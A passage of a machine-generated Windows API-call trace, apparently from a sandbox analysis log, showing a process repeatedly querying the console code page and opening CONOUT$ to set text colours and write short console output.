dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.247] GetLastError () returned 0xcb [0044.248] GetConsoleOutputCP () returned 0x1b5 [0044.248] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.248] GetLastError () returned 0xcb [0044.248] GetConsoleOutputCP () returned 0x1b5 [0044.248] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.248] GetLastError () returned 0xcb [0044.248] GetConsoleOutputCP () returned 0x1b5 [0044.248] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.248] GetLastError () returned 0xcb [0044.248] GetConsoleOutputCP () returned 0x1b5 [0044.248] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.248] GetLastError () returned 0xcb [0044.248] GetConsoleOutputCP () returned 0x1b5 [0044.248] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.248] GetLastError () returned 0xcb [0044.248] GetConsoleOutputCP () returned 0x1b5 [0044.248] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.248] GetLastError () returned 0xcb [0044.248] GetConsoleOutputCP () returned 0x1b5 [0044.248] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.249] GetLastError () returned 0xcb [0044.249] GetConsoleOutputCP () returned 0x1b5 [0044.249] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.249] GetLastError () returned 0xcb [0044.249] GetConsoleOutputCP () returned 0x1b5 [0044.249] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.249] GetLastError () returned 0xcb [0044.249] GetConsoleOutputCP () returned 0x1b5 [0044.249] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.249] GetLastError () returned 0xcb [0044.249] GetConsoleOutputCP () returned 0x1b5 [0044.249] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.249] GetLastError () returned 0xcb [0044.249] GetConsoleOutputCP () returned 0x1b5 [0044.249] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.249] GetLastError () returned 0xcb [0044.249] GetConsoleOutputCP () returned 0x1b5 [0044.249] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.249] GetLastError () returned 0xcb [0044.249] GetConsoleOutputCP () returned 0x1b5 [0044.249] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.249] GetLastError () returned 0xcb [0044.249] GetConsoleOutputCP () returned 0x1b5 [0044.250] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.250] GetLastError () returned 0xcb [0044.250] GetConsoleOutputCP () returned 0x1b5 [0044.250] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.250] GetLastError () returned 0xcb [0044.250] GetConsoleOutputCP () returned 0x1b5 [0044.250] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.250] GetLastError () returned 0xcb [0044.250] GetConsoleOutputCP () returned 0x1b5 [0044.250] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.250] GetLastError () returned 0xcb [0044.250] GetConsoleOutputCP () returned 0x1b5 [0044.250] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.250] GetLastError () returned 0xcb [0044.250] GetConsoleOutputCP () returned 0x1b5 [0044.250] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.250] GetLastError () returned 0xcb [0044.250] GetConsoleOutputCP () returned 0x1b5 [0044.250] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.250] GetLastError () returned 0xcb [0044.250] GetConsoleOutputCP () returned 0x1b5 [0044.250] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.250] GetLastError () returned 0xcb [0044.250] GetConsoleOutputCP () returned 0x1b5 [0044.251] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.251] GetLastError () returned 0xcb [0044.251] GetConsoleOutputCP () returned 0x1b5 [0044.251] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.251] GetLastError () returned 0xcb [0044.251] GetConsoleOutputCP () returned 0x1b5 [0044.251] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.251] GetLastError () returned 0xcb [0044.251] GetConsoleOutputCP () returned 0x1b5 [0044.251] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.251] GetLastError () returned 0xcb [0044.251] GetConsoleOutputCP () returned 0x1b5 [0044.251] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.251] GetLastError () returned 0xcb [0044.251] GetConsoleOutputCP () returned 0x1b5 [0044.251] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.251] GetLastError () returned 0xcb [0044.251] GetConsoleOutputCP () returned 0x1b5 [0044.251] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.251] GetLastError () returned 0xcb [0044.251] GetConsoleOutputCP () returned 0x1b5 [0044.251] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.251] GetLastError () returned 0xcb [0044.251] GetConsoleOutputCP () returned 0x1b5 [0044.252] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.252] GetLastError () returned 0xcb [0044.252] GetConsoleOutputCP () returned 0x1b5 [0044.252] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.252] GetLastError () returned 0xcb [0044.252] GetConsoleOutputCP () returned 0x1b5 [0044.252] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.252] GetLastError () returned 0xcb [0044.252] GetConsoleOutputCP () returned 0x1b5 [0044.252] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.252] GetLastError () returned 0xcb [0044.252] GetConsoleOutputCP () returned 0x1b5 [0044.252] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.252] GetLastError () returned 0xcb [0044.252] GetConsoleOutputCP () returned 0x1b5 [0044.252] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.252] GetLastError () returned 0xcb [0044.252] GetConsoleOutputCP () returned 0x1b5 [0044.252] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.252] GetLastError () returned 0xcb [0044.252] GetConsoleOutputCP () returned 0x1b5 [0044.252] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.252] GetLastError () returned 0xcb [0044.252] GetConsoleOutputCP () returned 0x1b5 [0044.253] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.253] GetLastError () returned 0xcb [0044.253] GetConsoleOutputCP () returned 0x1b5 [0044.253] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.253] GetLastError () returned 0xcb [0044.253] GetConsoleOutputCP () returned 0x1b5 [0044.253] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.253] GetLastError () returned 0xcb [0044.253] GetConsoleOutputCP () returned 0x1b5 [0044.253] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.253] GetLastError () returned 0xcb [0044.253] GetConsoleOutputCP () returned 0x1b5 [0044.253] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.253] GetLastError () returned 0xcb [0044.253] GetConsoleOutputCP () returned 0x1b5 [0044.253] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.253] GetLastError () returned 0xcb [0044.253] GetConsoleOutputCP () returned 0x1b5 [0044.253] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.253] GetLastError () returned 0xcb [0044.253] GetConsoleOutputCP () returned 0x1b5 [0044.254] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.254] GetLastError () returned 0xcb [0044.254] GetConsoleOutputCP () returned 0x1b5 [0044.254] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb20) returned 0 [0044.254] GetLastError () returned 0xcb [0044.254] GetConsoleOutputCP () returned 0x1b5 [0044.254] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb20) returned 0 [0044.254] GetLastError () returned 0xcb [0044.254] GetConsoleOutputCP () returned 0x1b5 [0044.254] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb20, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb20) returned 0 [0044.254] GetLastError () returned 0xcb [0044.254] GetConsoleOutputCP () returned 0x1b5 [0044.254] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.254] GetLastError () returned 0xcb [0044.254] GetConsoleOutputCP () returned 0x1b5 [0044.254] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.254] GetLastError () returned 0xcb [0044.254] GetConsoleOutputCP () returned 0x1b5 [0044.268] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17 [0044.268] GetLastError () returned 0xcb [0044.268] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x17, lpConsoleScreenBufferInfo=0x510eaf8 | out: lpConsoleScreenBufferInfo=0x510eaf8) returned 1 [0044.268] GetLastError () returned 0xcb [0044.270] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0044.270] GetLastError () returned 0xcb [0044.270] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x510eb70 | out: lpMode=0x510eb70) returned 1 [0044.270] GetLastError () returned 0xcb [0044.273] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b [0044.274] GetLastError () returned 0xcb [0044.274] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1b, lpConsoleScreenBufferInfo=0x510ea98 | out: lpConsoleScreenBufferInfo=0x510ea98) returned 1 [0044.274] GetLastError () returned 0xcb [0044.276] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f [0044.276] GetLastError () returned 0xcb [0044.276] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1f, lpConsoleScreenBufferInfo=0x510ea98 | out: lpConsoleScreenBufferInfo=0x510ea98) returned 1 [0044.276] GetLastError () returned 0xcb [0044.279] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0044.279] GetLastError () returned 0xcb [0044.279] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x510eaa0 | out: lpConsoleScreenBufferInfo=0x510eaa0) returned 1 [0044.279] GetLastError () returned 0xcb [0044.281] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0xc) returned 1 [0044.281] GetLastError () returned 0xcb [0044.281] CloseHandle (hObject=0x23) returned 1 [0044.282] GetLastError () returned 0xcb [0044.284] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0044.284] GetLastError () returned 0xcb [0044.284] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x510eaa0 | out: lpConsoleScreenBufferInfo=0x510eaa0) returned 1 [0044.284] GetLastError () returned 0xcb [0044.284] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0xc) returned 1 [0044.284] GetLastError () returned 0xcb [0044.285] CloseHandle (hObject=0x23) returned 1 [0044.285] GetLastError () returned 0xcb [0044.285] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0044.285] GetLastError () returned 0xcb [0044.285] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x510eb08 | out: lpMode=0x510eb08) returned 1 [0044.285] GetLastError () returned 0xcb [0044.287] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0044.288] GetLastError () returned 0xcb [0044.288] GetConsoleMode (in: hConsoleHandle=0x23, lpMode=0x510eaec | out: lpMode=0x510eaec) returned 1 [0044.288] GetLastError () returned 0xcb [0044.292] WriteConsoleW (in: hConsoleOutput=0x23, lpBuffer=0x2548fbc*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x510eaec, lpReserved=0x0 | out: lpBuffer=0x2548fbc*, lpNumberOfCharsWritten=0x510eaec*=0x4f) returned 1 [0044.293] GetLastError () returned 0xcb [0044.293] CloseHandle (hObject=0x23) returned 1 [0044.293] GetLastError () returned 0xcb [0044.296] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0044.296] GetLastError () returned 0xcb [0044.296] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x510ea9c | out: lpConsoleScreenBufferInfo=0x510ea9c) returned 1 [0044.296] GetLastError () returned 0xcb [0044.296] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0x7) returned 1 [0044.296] GetLastError () returned 0xcb [0044.296] CloseHandle (hObject=0x23) returned 1 [0044.297] GetLastError () returned 0xcb [0044.299] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0044.299] GetLastError () returned 0xcb [0044.299] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x510ea9c | out: lpConsoleScreenBufferInfo=0x510ea9c) returned 1 [0044.299] GetLastError () returned 0xcb [0044.299] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0x7) returned 1 [0044.299] GetLastError () returned 0xcb [0044.299] CloseHandle (hObject=0x23) returned 1 [0044.300] GetLastError () returned 0xcb [0044.302] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0044.302] GetLastError () returned 0xcb [0044.302] GetConsoleMode (in: hConsoleHandle=0x23, lpMode=0x510eb2c | out: lpMode=0x510eb2c) returned 1 [0044.302] GetLastError () returned 0xcb [0044.302] WriteConsoleW (in: hConsoleOutput=0x23, lpBuffer=0x1df9b74*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x510eb2c, lpReserved=0x0 | out: lpBuffer=0x1df9b74*, lpNumberOfCharsWritten=0x510eb2c*=0x1) returned 1 [0044.302] GetLastError () returned 0xcb [0044.302] CloseHandle (hObject=0x23) returned 1 [0044.303] GetLastError () returned 0xcb [0044.305] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23 [0044.305] GetLastError () returned 0xcb [0044.305] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x23, lpConsoleScreenBufferInfo=0x510eaf8 | out: lpConsoleScreenBufferInfo=0x510eaf8) returned 1 [0044.305] GetLastError () returned 0xcb [0044.305] GetConsoleOutputCP () returned 0x1b5 [0044.305] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.305] GetLastError () returned 0xcb [0044.308] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27 [0044.308] GetLastError () returned 0xcb [0044.308] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x27, lpConsoleScreenBufferInfo=0x510ea98 | out: lpConsoleScreenBufferInfo=0x510ea98) returned 1 [0044.308] GetLastError () returned 0xcb [0044.310] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b [0044.310] GetLastError () returned 0xcb [0044.310] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2b, lpConsoleScreenBufferInfo=0x510ea98 | out: lpConsoleScreenBufferInfo=0x510ea98) returned 1 [0044.311] GetLastError () returned 0xcb [0044.312] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0044.313] GetLastError () returned 0xcb [0044.313] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x510eaa0 | out: lpConsoleScreenBufferInfo=0x510eaa0) returned 1 [0044.313] GetLastError () returned 0xcb [0044.313] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0xc) returned 1 [0044.313] GetLastError () returned 0xcb [0044.313] CloseHandle (hObject=0x2f) returned 1 [0044.313] GetLastError () returned 0xcb [0044.315] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0044.316] GetLastError () returned 0xcb [0044.316] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x510eaa0 | out: lpConsoleScreenBufferInfo=0x510eaa0) returned 1 [0044.316] GetLastError () returned 0xcb [0044.316] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0xc) returned 1 [0044.316] GetLastError () returned 0xcb [0044.316] CloseHandle (hObject=0x2f) returned 1 [0044.316] GetLastError () returned 0xcb [0044.318] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0044.319] GetLastError () returned 0xcb [0044.319] GetConsoleMode (in: hConsoleHandle=0x2f, lpMode=0x510eaec | out: lpMode=0x510eaec) returned 1 [0044.319] GetLastError () returned 0xcb [0044.319] WriteConsoleW (in: hConsoleOutput=0x2f, lpBuffer=0x25495f8*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x510eaec, lpReserved=0x0 | out: lpBuffer=0x25495f8*, lpNumberOfCharsWritten=0x510eaec*=0x4) returned 1 [0044.319] GetLastError () returned 0xcb [0044.319] CloseHandle (hObject=0x2f) returned 1 [0044.319] GetLastError () returned 0xcb [0044.321] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0044.321] GetLastError () returned 0xcb [0044.321] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x510ea9c | out: lpConsoleScreenBufferInfo=0x510ea9c) returned 1 [0044.322] GetLastError () returned 0xcb [0044.322] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0x7) returned 1 [0044.322] GetLastError () returned 0xcb [0044.322] CloseHandle (hObject=0x2f) returned 1 [0044.322] GetLastError () returned 0xcb [0044.324] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0044.324] GetLastError () returned 0xcb [0044.324] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x510ea9c | out: lpConsoleScreenBufferInfo=0x510ea9c) returned 1 [0044.324] GetLastError () returned 0xcb [0044.324] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0x7) returned 1 [0044.324] GetLastError () returned 0xcb [0044.324] CloseHandle (hObject=0x2f) returned 1 [0044.325] GetLastError () returned 0xcb [0044.327] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0044.327] GetLastError () returned 0xcb [0044.327] GetConsoleMode (in: hConsoleHandle=0x2f, lpMode=0x510eb2c | out: lpMode=0x510eb2c) returned 1 [0044.327] GetLastError () returned 0xcb [0044.327] WriteConsoleW (in: hConsoleOutput=0x2f, lpBuffer=0x1df9b74*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x510eb2c, lpReserved=0x0 | out: lpBuffer=0x1df9b74*, lpNumberOfCharsWritten=0x510eb2c*=0x1) returned 1 [0044.327] GetLastError () returned 0xcb [0044.327] CloseHandle (hObject=0x2f) returned 1 [0044.327] GetLastError () returned 0xcb [0044.329] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f [0044.330] GetLastError () returned 0xcb [0044.330] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x2f, lpConsoleScreenBufferInfo=0x510eaf8 | out: lpConsoleScreenBufferInfo=0x510eaf8) returned 1 [0044.330] GetLastError () returned 0xcb [0044.330] GetConsoleOutputCP () returned 0x1b5 [0044.330] TranslateCharsetInfo (in: lpSrc=0x1b5, lpCs=0x510eb00, dwFlags=0x2 | out: lpSrc=0x1b5, lpCs=0x510eb00) returned 0 [0044.330] GetLastError () returned 0xcb [0044.332] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33 [0044.332] GetLastError () returned 0xcb [0044.332] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x33, lpConsoleScreenBufferInfo=0x510ea98 | out: lpConsoleScreenBufferInfo=0x510ea98) returned 1 [0044.332] GetLastError () returned 0xcb [0044.334] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37 [0044.335] GetLastError () returned 0xcb [0044.336] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x37, lpConsoleScreenBufferInfo=0x510ea98 | out: lpConsoleScreenBufferInfo=0x510ea98) returned 1 [0044.336] GetLastError () returned 0xcb [0044.338] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0044.338] GetLastError () returned 0xcb [0044.338] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x3b, lpConsoleScreenBufferInfo=0x510eaa0 | out: lpConsoleScreenBufferInfo=0x510eaa0) returned 1 [0044.338] GetLastError () returned 0xcb [0044.338] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0xc) returned 1 [0044.338] GetLastError () returned 0xcb [0044.338] CloseHandle (hObject=0x3b) returned 1 [0044.339] GetLastError () returned 0xcb [0044.341] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b [0044.341] GetLastError () returned 0xcb [0044.341] GetConsoleScreenBufferInfo (in: 